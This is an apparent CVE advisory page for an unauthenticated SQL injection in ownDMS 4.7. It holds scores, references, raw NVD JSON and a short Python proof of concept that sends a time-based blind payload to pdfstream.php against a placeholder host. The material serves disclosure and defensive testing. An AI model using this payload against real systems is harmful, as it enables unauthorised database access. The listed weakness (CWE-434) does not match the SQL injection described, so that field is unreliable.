CVE-2019-25580

Description

ownDMS 4.7 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the IMG parameter. Attackers can send GET requests to pdfstream.php, imagestream.php, or anyfilestream.php with crafted SQL payloads in the IMG parameter to extract sensitive database information including version and database names.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:owndms:owndms:*:*:*:*:*:*:*:* - VULNERABLE

ownDMS 4.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
url = "http://example.com/owndms/pdfstream.php"

# SQL Injection Payload (Example: Time-based blind)
payload = "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -"

params = {
    "IMG": payload
}

try:
    response = requests.get(url, params=params, timeout=10)
    # Analyze response time or content to confirm vulnerability
    if response.elapsed.total_seconds() >= 5:
        print("[+] Vulnerability confirmed: SQL Injection detected.")
    else:
        print("[-] Vulnerability not detected or payload failed.")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25580
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25580
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25580/
[4] VulDB https://vuldb.com/cve/CVE-2019-25580
[5] http://www.owndms.com/
[6] https://datapacket.dl.sourceforge.net/project/owndms/owndms_47.zip
[7] https://www.exploit-db.com/exploits/46168
[8] https://www.vulncheck.com/advisories/owndms-sql-injection-via-pdfstream-php-imagestream-php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25580", "sourceIdentifier": "[email protected]", "published": "2026-03-21T16:16:02.110", "lastModified": "2026-04-15T16:49:00.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ownDMS 4.7 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the IMG parameter. Attackers can send GET requests to pdfstream.php, imagestream.php, or anyfilestream.php with crafted SQL payloads in the IMG parameter to extract sensitive database information including version and database names."}, {"lang": "es", "value": "ownDMS 4.7 contiene una vulnerabilidad de inyección SQL que permite a atacantes no autenticados ejecutar consultas SQL arbitrarias inyectando código malicioso a través del parámetro IMG. Los atacantes pueden enviar solicitudes GET a pdfstream.php, imagestream.php o anyfilestream.php con cargas útiles SQL manipuladas en el parámetro IMG para extraer información sensible de la base de datos, incluyendo la versión y los nombres de la base de datos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:owndms:owndms:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7", "matchCriteriaId": "C6931C75-9C9C-4090-89BD-78489E5424EF"}]}]}], "references": [{"url": "http://www.owndms.com/", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://datapacket.dl.sourceforge.net/project/owndms/owndms_47.zip", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://www.exploit-db.com/exploits/46168", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/owndms-sql-injection-via-pdfstream-php-imagestream-php", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}